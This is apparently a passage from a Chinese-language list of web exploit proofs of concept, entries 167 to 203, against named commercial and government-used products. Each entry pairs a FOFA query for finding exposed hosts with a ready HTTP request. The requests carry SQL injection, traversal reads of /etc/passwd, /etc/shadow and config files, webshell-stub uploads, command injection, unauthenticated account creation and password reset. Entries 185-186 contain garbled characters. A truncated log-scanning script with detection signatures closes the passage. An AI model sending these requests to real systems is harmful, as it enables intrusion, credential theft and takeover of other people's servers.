FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

( }0 C& z. A- P1 H$ q  ^1 u: H185. 瑞友天翼应用虚拟化系统SQL注入( ~. P9 [1 t5 R% t* v, L- Q
version < 7.0.5.1" ?. [: Q. {/ E
FOFA:app="REALOR-天翼应用虚拟化系统"
% [! A3 s0 K; PGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
: M2 t9 ?, `: I1 ?" W3 bHost: host
3 r1 [, Z6 }: p# p' {% E. F8 d$ @, C2 n" ~8 D2 u

$ }6 [' z$ x6 p- O2 R186. F-logic DataCube3 SQL注入
* z# x( |+ N2 ACVE-2024-31750% H8 P0 @, l7 J
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统$ h; e( ]# T# i% h
FOFA:title=="DataCube3"
9 p& c( n/ D6 i2 L; kPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1  [2 U6 F( |, t" w% P
Host: your-ip
6 [6 p( S$ |1 }1 `- V" hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0% _: ~$ x8 M0 I7 B8 C3 `, l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8% f- n; D! o1 G" K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 U- v  {" H' v; e  c7 f  H: ]6 E
Accept-Encoding: gzip, deflate
/ B. f9 S3 d9 q+ {' X" w- r( A& B( |Connection: close
. I2 I% P- V: m2 X; |% s7 V' yContent-Type: application/x-www-form-urlencoded+ p( D( M* S* t4 o, j- |
+ A5 Y/ [+ c* z$ S
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14501 k( ^& }8 H5 R* w2 w! B: |

6 {! u+ r3 p7 R. G0 t, f1 k. `" {" `# G9 W' p: o8 _
187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

MySQL time-based injection in contenthistid (the %5c backslash neutralises the escaping of the following quote); a response delayed by about 5 s confirms it.

188. Santi Jiahui Video Conferencing (叁体-佳会视频会议) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon Technology Clinical Browsing System (蓝网科技临床浏览系统) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Stacked MSSQL injection in documentUniqueId; a response delayed by about 5 s confirms it.

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi value is treated as a URL to fetch, which is why a file:// scheme reads a local file here rather than a ../ traversal string.

191. Yisaitong Electronic Document Security Management System (亿赛通电子文档安全管理系统) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

MSSQL time-based injection in the id parameter. The /js/../ segment is part of the PoC path and is collapsed by the servlet container to /CDGServer3/NavigationAjax, so log searches should match on NavigationAjax rather than the literal request path.

192. Futong Tianxia Foreign Trade ERP (富通天下外贸ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The request body is the raw .ashx handler source and the stored extension comes from the name query parameter; the source does not give the path under which the uploaded handler is served.

193. Hillstone Networks Yunjian Security Management System (山石网科云鉴安全管理系统) setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Obtain a CSRF token for an attacker-chosen PHPSESSID:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Replace {{token}} with the value returned above. The param value is evaluated as Python, and os.system() writes a marker file into the web-served runtime/img directory:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Read the marker back:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. Feiqi Hulian FE Enterprise Operations Management Platform (飞企互联-FE企业运营管理平台) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename carries a ../ traversal into the deployed fe.war, so the JSP is written inside the web application itself; the json part is the request shape the servlet expects.

195. Feiyuxing (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is interpolated into a shell command; the output of uname -a in the response confirms the injection.

196. Henan Fengsu Technology Unified Authentication Platform (河南省风速科技统一认证平台) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

The endpoint sets the password of the account named in xgh to newPass; the request carries no session or token.

197. Zheda Ente Customer Resource Management System (浙大恩特客户资源管理系统) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

UNION-based: 12321 (the product 111*111) appearing in the response confirms the injection.

198. Aliyun Drive WebDAV (阿里云盘 WebDAV) LuCI command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls />/www/aaa.txt`, executed through shell backticks. The request carries a sysauth cookie, so an authenticated LuCI session is required.

199. Cockpit (cockpit系统) assetsmanager/upload file upload
FOFA:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and request the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, the body contains csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

Step 2 logs in with admin/admin: the upload needs an authenticated session, so this chain depends on valid (here, default) credentials rather than on an unauthenticated flaw.

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

MySQL time-based injection in id; a response delayed by about 5 s confirms it.

201. Founder Omni-media News Editing System (方正全媒体新闻采编系统) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName is concatenated into the query; decoded it reads DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH (MSSQL stacked queries, confirmed by the 5 s delay).

202. Weiqing system (微擎系统) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload request (上传图片 is the submit button's value and must be sent as-is):
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. Redsea Cloud EHR (红海云EHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

The image/jpeg part type does not stop the .jsp filename from being stored; the source does not give the path of the uploaded file.

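The article is meant for defenders checking their own exposure, so the most useful companion to entries 185-203 is a sweep of web-server access logs for the request shapes listed above. The script below is an added example and not part of the original article. Its signature table is taken from the PoCs on this page (endpoint path, or the routed query for entry 185, plus a payload marker where the PoC carries the payload in the URL); the "path" and "path+payload" strength labels, the ENTRY_185_TARGET decoding helper and the SAMPLE_LOG lines are this example's own constructions. POST bodies are not in access logs, so body-borne payloads (186, 191, 201 and others) match on the endpoint alone.

```python
"""Sweep an access log for the request signatures of entries 185-203 on this page.

Added example for the defensive review the article recommends; not code from the
article. Targets are percent-decoded twice, lower-cased and dot-segment-normalised
before matching, so encoded or /js/../ style variants still hit. Sample log lines
are constructed.
"""
import posixpath
import re
from urllib.parse import unquote_plus, urlsplit

# Entry 185 request target, verbatim from the PoC above (used to demonstrate decoding).
ENTRY_185_TARGET = (
    "/index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%27"
    "3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b"
    "20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5C"
    "WebRoot%5C%5Cplom.xgi%27%23"
)

# (entry, fragment looked for in "path?query", marker that shows the payload itself, or None)
SIGNATURES = [
    (185, "s=/admin/appsave", "into outfile"),
    (186, "/admin/pr_monitor/getting_index_data.php", None),
    (187, "/index.cfm/_api/json/v1/default", "method=processasyncobject"),
    (188, "/attachment", "file=/"),
    (189, "/xds/deletestudy.php", "waitfor delay"),
    (190, "/index.php/admin/userinfo/poihuoqu", None),
    (191, "/navigationajax", None),
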